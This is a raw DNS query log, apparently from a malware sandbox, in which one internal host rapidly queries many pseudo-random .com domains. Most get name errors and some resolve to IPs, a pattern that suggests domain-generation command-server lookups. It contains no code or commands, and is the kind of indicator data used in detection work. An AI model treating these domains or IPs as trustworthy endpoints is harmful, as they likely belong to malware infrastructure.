Aug 23, 2024 18:43:03.614546061 CEST	1.1.1.1	192.168.2.5	0xb439	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.618558884 CEST	1.1.1.1	192.168.2.5	0x4065	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.620049000 CEST	1.1.1.1	192.168.2.5	0x6c0d	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.620214939 CEST	1.1.1.1	192.168.2.5	0x8e93	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.621092081 CEST	1.1.1.1	192.168.2.5	0xf323	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.621685982 CEST	1.1.1.1	192.168.2.5	0xa465	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.621685982 CEST	1.1.1.1	192.168.2.5	0xa465	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.622172117 CEST	1.1.1.1	192.168.2.5	0xf1a6	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.622946024 CEST	1.1.1.1	192.168.2.5	0x57c7	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.623070955 CEST	1.1.1.1	192.168.2.5	0xc834	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.623080015 CEST	1.1.1.1	192.168.2.5	0x61e8	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.623677015 CEST	1.1.1.1	192.168.2.5	0x96f1	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.624197960 CEST	1.1.1.1	192.168.2.5	0xca93	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.624414921 CEST	1.1.1.1	192.168.2.5	0xd2cd	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.624589920 CEST	1.1.1.1	192.168.2.5	0x8047	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.625240088 CEST	1.1.1.1	192.168.2.5	0xb462	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.625442028 CEST	1.1.1.1	192.168.2.5	0x2296	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.625545025 CEST	1.1.1.1	192.168.2.5	0x1c74	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.626390934 CEST	1.1.1.1	192.168.2.5	0x7c4b	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.627851009 CEST	1.1.1.1	192.168.2.5	0x42a0	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.627851009 CEST	1.1.1.1	192.168.2.5	0x42a0	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.629033089 CEST	1.1.1.1	192.168.2.5	0xd641	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.629033089 CEST	1.1.1.1	192.168.2.5	0xd641	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.633634090 CEST	1.1.1.1	192.168.2.5	0xb24f	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.642059088 CEST	1.1.1.1	192.168.2.5	0x7a03	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.644088030 CEST	1.1.1.1	192.168.2.5	0xa401	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.644098043 CEST	1.1.1.1	192.168.2.5	0x42a7	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.644107103 CEST	1.1.1.1	192.168.2.5	0x4132	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.644119978 CEST	1.1.1.1	192.168.2.5	0x3159	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.644391060 CEST	1.1.1.1	192.168.2.5	0xe2e8	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.644399881 CEST	1.1.1.1	192.168.2.5	0xa651	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.644485950 CEST	1.1.1.1	192.168.2.5	0x6b3b	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.644754887 CEST	1.1.1.1	192.168.2.5	0xb04b	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.645159006 CEST	1.1.1.1	192.168.2.5	0xb5c6	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.645168066 CEST	1.1.1.1	192.168.2.5	0xb14	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.645795107 CEST	1.1.1.1	192.168.2.5	0xa395	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.645987988 CEST	1.1.1.1	192.168.2.5	0xc75c	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.646364927 CEST	1.1.1.1	192.168.2.5	0x393a	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.646486998 CEST	1.1.1.1	192.168.2.5	0x612	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.646622896 CEST	1.1.1.1	192.168.2.5	0xef99	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.646934032 CEST	1.1.1.1	192.168.2.5	0x2b96	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.646943092 CEST	1.1.1.1	192.168.2.5	0x5ba6	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.646950960 CEST	1.1.1.1	192.168.2.5	0x1223	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.647044897 CEST	1.1.1.1	192.168.2.5	0xd707	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.647195101 CEST	1.1.1.1	192.168.2.5	0xb9f4	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.647203922 CEST	1.1.1.1	192.168.2.5	0xbde0	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.647274017 CEST	1.1.1.1	192.168.2.5	0xe909	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.647660971 CEST	1.1.1.1	192.168.2.5	0x44c8	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.647778988 CEST	1.1.1.1	192.168.2.5	0xf747	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.647921085 CEST	1.1.1.1	192.168.2.5	0x1b0a	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.647929907 CEST	1.1.1.1	192.168.2.5	0xd3ba	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.648019075 CEST	1.1.1.1	192.168.2.5	0xb546	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.648159027 CEST	1.1.1.1	192.168.2.5	0xdb3a	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.648159027 CEST	1.1.1.1	192.168.2.5	0xdb3a	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.648277998 CEST	1.1.1.1	192.168.2.5	0x51fd	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.648416042 CEST	1.1.1.1	192.168.2.5	0xc544	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.648502111 CEST	1.1.1.1	192.168.2.5	0xa966	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.648631096 CEST	1.1.1.1	192.168.2.5	0x1ac2	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.648756981 CEST	1.1.1.1	192.168.2.5	0x3b2e	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.648756981 CEST	1.1.1.1	192.168.2.5	0x3b2e	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.649266958 CEST	1.1.1.1	192.168.2.5	0x7cae	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.649386883 CEST	1.1.1.1	192.168.2.5	0x27b6	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.650885105 CEST	1.1.1.1	192.168.2.5	0x9a00	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.651395082 CEST	1.1.1.1	192.168.2.5	0xd08	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.657529116 CEST	1.1.1.1	192.168.2.5	0x1040	No error (0)	lysyfyj.com		69.162.80.57	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.668309927 CEST	1.1.1.1	192.168.2.5	0x7f1c	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.668373108 CEST	1.1.1.1	192.168.2.5	0x5f7c	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.668909073 CEST	1.1.1.1	192.168.2.5	0xbaf4	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.669007063 CEST	1.1.1.1	192.168.2.5	0x9247	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.669729948 CEST	1.1.1.1	192.168.2.5	0xa9ac	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.670104980 CEST	1.1.1.1	192.168.2.5	0x3b41	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.670705080 CEST	1.1.1.1	192.168.2.5	0xb009	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.671292067 CEST	1.1.1.1	192.168.2.5	0x1852	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.696552038 CEST	1.1.1.1	192.168.2.5	0xb15b	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.698964119 CEST	1.1.1.1	192.168.2.5	0x4aa8	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.700145960 CEST	1.1.1.1	192.168.2.5	0x9249	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.701844931 CEST	1.1.1.1	192.168.2.5	0x3ce6	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.701886892 CEST	1.1.1.1	192.168.2.5	0x42b6	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.702153921 CEST	1.1.1.1	192.168.2.5	0xea59	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.702871084 CEST	1.1.1.1	192.168.2.5	0x7378	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.702939034 CEST	1.1.1.1	192.168.2.5	0x6c15	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.703963041 CEST	1.1.1.1	192.168.2.5	0xfee7	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.704037905 CEST	1.1.1.1	192.168.2.5	0xc68c	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.704037905 CEST	1.1.1.1	192.168.2.5	0xc68c	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.706191063 CEST	1.1.1.1	192.168.2.5	0x8c31	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.706356049 CEST	1.1.1.1	192.168.2.5	0x56b1	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.707686901 CEST	1.1.1.1	192.168.2.5	0x8ea3	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.709068060 CEST	1.1.1.1	192.168.2.5	0x6ad6	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.709296942 CEST	1.1.1.1	192.168.2.5	0xe9ce	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.710731983 CEST	1.1.1.1	192.168.2.5	0x4b04	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.714659929 CEST	1.1.1.1	192.168.2.5	0x2716	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.714736938 CEST	1.1.1.1	192.168.2.5	0xc250	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.715150118 CEST	1.1.1.1	192.168.2.5	0xc48c	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.715627909 CEST	1.1.1.1	192.168.2.5	0x3efb	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.719425917 CEST	1.1.1.1	192.168.2.5	0xbbc9	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.722024918 CEST	1.1.1.1	192.168.2.5	0x2f0a	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.723517895 CEST	1.1.1.1	192.168.2.5	0xd6ea	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.725817919 CEST	1.1.1.1	192.168.2.5	0x4130	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.736871004 CEST	1.1.1.1	192.168.2.5	0xb7db	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.736923933 CEST	1.1.1.1	192.168.2.5	0xdab1	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.737013102 CEST	1.1.1.1	192.168.2.5	0x105c	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.737528086 CEST	1.1.1.1	192.168.2.5	0xd80a	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.737842083 CEST	1.1.1.1	192.168.2.5	0xbf6	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.737947941 CEST	1.1.1.1	192.168.2.5	0x8bb7	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.738820076 CEST	1.1.1.1	192.168.2.5	0x86b5	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.739443064 CEST	1.1.1.1	192.168.2.5	0x4385	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.743196011 CEST	1.1.1.1	192.168.2.5	0x4a7	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.746109009 CEST	1.1.1.1	192.168.2.5	0x66e2	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.750257969 CEST	1.1.1.1	192.168.2.5	0x5e6d	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.765007973 CEST	1.1.1.1	192.168.2.5	0xc6c3	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.765486002 CEST	1.1.1.1	192.168.2.5	0xcafb	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.766196012 CEST	1.1.1.1	192.168.2.5	0x2fe1	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.766225100 CEST	1.1.1.1	192.168.2.5	0x28d1	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.769408941 CEST	1.1.1.1	192.168.2.5	0x5246	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.769418001 CEST	1.1.1.1	192.168.2.5	0x9ffb	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.769428015 CEST	1.1.1.1	192.168.2.5	0x9a6c	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.769445896 CEST	1.1.1.1	192.168.2.5	0x124c	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.769738913 CEST	1.1.1.1	192.168.2.5	0xfeed	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.769820929 CEST	1.1.1.1	192.168.2.5	0xeeeb	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.770122051 CEST	1.1.1.1	192.168.2.5	0xa16d	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.772443056 CEST	1.1.1.1	192.168.2.5	0xbc9e	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.772546053 CEST	1.1.1.1	192.168.2.5	0x28b2	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.780978918 CEST	1.1.1.1	192.168.2.5	0xf21e	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.789258003 CEST	1.1.1.1	192.168.2.5	0x496d	No error (0)	galyqaz.com		199.191.50.83	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.793740988 CEST	1.1.1.1	192.168.2.5	0x607	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.798367977 CEST	1.1.1.1	192.168.2.5	0xfdea	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.798548937 CEST	1.1.1.1	192.168.2.5	0x6239	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.806190014 CEST	1.1.1.1	192.168.2.5	0x9e5d	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.806190014 CEST	1.1.1.1	192.168.2.5	0x9e5d	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.841764927 CEST	1.1.1.1	192.168.2.5	0xfde0	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.882235050 CEST	1.1.1.1	192.168.2.5	0xb523	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.890714884 CEST	1.1.1.1	192.168.2.5	0x6d21	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.890714884 CEST	1.1.1.1	192.168.2.5	0x6d21	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.902164936 CEST	1.1.1.1	192.168.2.5	0x65b6	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.902164936 CEST	1.1.1.1	192.168.2.5	0x65b6	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.945152998 CEST	1.1.1.1	192.168.2.5	0xb09e	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.981477976 CEST	1.1.1.1	192.168.2.5	0x6a36	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.002361059 CEST	1.1.1.1	192.168.2.5	0xfdd	No error (0)	lysyfyj.com		69.162.80.57	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.400718927 CEST	1.1.1.1	192.168.2.5	0x269b	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.402476072 CEST	1.1.1.1	192.168.2.5	0x269b	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.488106966 CEST	1.1.1.1	192.168.2.5	0x7b39	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.488106966 CEST	1.1.1.1	192.168.2.5	0x7b39	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.488106966 CEST	1.1.1.1	192.168.2.5	0x7b39	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.488106966 CEST	1.1.1.1	192.168.2.5	0x7b39	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.488106966 CEST	1.1.1.1	192.168.2.5	0x7b39	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.488106966 CEST	1.1.1.1	192.168.2.5	0x7b39	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.488106966 CEST	1.1.1.1	192.168.2.5	0x7b39	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.488106966 CEST	1.1.1.1	192.168.2.5	0x7b39	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.488195896 CEST	1.1.1.1	192.168.2.5	0x7b39	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.488195896 CEST	1.1.1.1	192.168.2.5	0x7b39	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.488195896 CEST	1.1.1.1	192.168.2.5	0x7b39	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.488195896 CEST	1.1.1.1	192.168.2.5	0x7b39	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.488195896 CEST	1.1.1.1	192.168.2.5	0x7b39	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.488195896 CEST	1.1.1.1	192.168.2.5	0x7b39	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.488195896 CEST	1.1.1.1	192.168.2.5	0x7b39	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.488195896 CEST	1.1.1.1	192.168.2.5	0x7b39	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.810070992 CEST	1.1.1.1	192.168.2.5	0xc89a	Name error (3)	pumylel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.816224098 CEST	1.1.1.1	192.168.2.5	0x1c02	Name error (3)	vonyket.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.819396019 CEST	1.1.1.1	192.168.2.5	0x2feb	Name error (3)	pupypiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.822829008 CEST	1.1.1.1	192.168.2.5	0x8edd	Name error (3)	lykynyj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.826098919 CEST	1.1.1.1	192.168.2.5	0xc12b	Name error (3)	vopypif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.827125072 CEST	1.1.1.1	192.168.2.5	0x356d	Name error (3)	qebykap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.828768969 CEST	1.1.1.1	192.168.2.5	0x2ea0	Name error (3)	pujybyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.828898907 CEST	1.1.1.1	192.168.2.5	0xdac7	Name error (3)	qedysov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.831705093 CEST	1.1.1.1	192.168.2.5	0xbf73	Name error (3)	gatypub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.833802938 CEST	1.1.1.1	192.168.2.5	0x5e59	Name error (3)	lysysod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.833812952 CEST	1.1.1.1	192.168.2.5	0x76b3	Name error (3)	vojybek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.837779999 CEST	1.1.1.1	192.168.2.5	0x793e	Name error (3)	qekynuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.855202913 CEST	1.1.1.1	192.168.2.5	0x9ddf	Name error (3)	lyvyjox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.861810923 CEST	1.1.1.1	192.168.2.5	0x5aa1	Name error (3)	ganykaz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.935813904 CEST	1.1.1.1	192.168.2.5	0x398f	Name error (3)	puvyjop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.936284065 CEST	1.1.1.1	192.168.2.5	0x71df	Name error (3)	qetytug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.941492081 CEST	1.1.1.1	192.168.2.5	0x55	Name error (3)	purytyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.944663048 CEST	1.1.1.1	192.168.2.5	0x5e52	Name error (3)	vowyrym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.944864988 CEST	1.1.1.1	192.168.2.5	0x99	Name error (3)	qekyfeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.944874048 CEST	1.1.1.1	192.168.2.5	0xd649	Name error (3)	pumywaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.945316076 CEST	1.1.1.1	192.168.2.5	0xcc1d	Name error (3)	gacyhis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.945811987 CEST	1.1.1.1	192.168.2.5	0x87d7	Name error (3)	pufycol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.945821047 CEST	1.1.1.1	192.168.2.5	0xc303	Name error (3)	volygyf.com	none	none	A (IP address)	IN (0x0001)	false
